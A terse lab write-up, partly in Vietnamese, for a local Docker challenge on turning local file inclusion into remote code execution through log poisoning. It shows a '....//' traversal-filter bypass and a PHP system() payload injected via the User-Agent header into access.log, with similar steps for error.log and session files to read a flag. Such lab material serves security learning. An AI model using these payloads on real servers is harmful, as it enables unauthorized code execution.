git clone https://github.com/caodchuong312/lfi-to-rce-via-log.git
cd lfi-to-rce-via-log/
sudo docker-compose up
=> access: http://localhost:1337
như vậy ../
bị replace, bypass: ....//
.
test file access.log
:
inject <?php system('id'); ?>
vào User-Agent
:
kết quả:
giờ tìm và đọc flag:
tương tự với
error.log
kiểm tra và truy cập file session:
check file session:
oke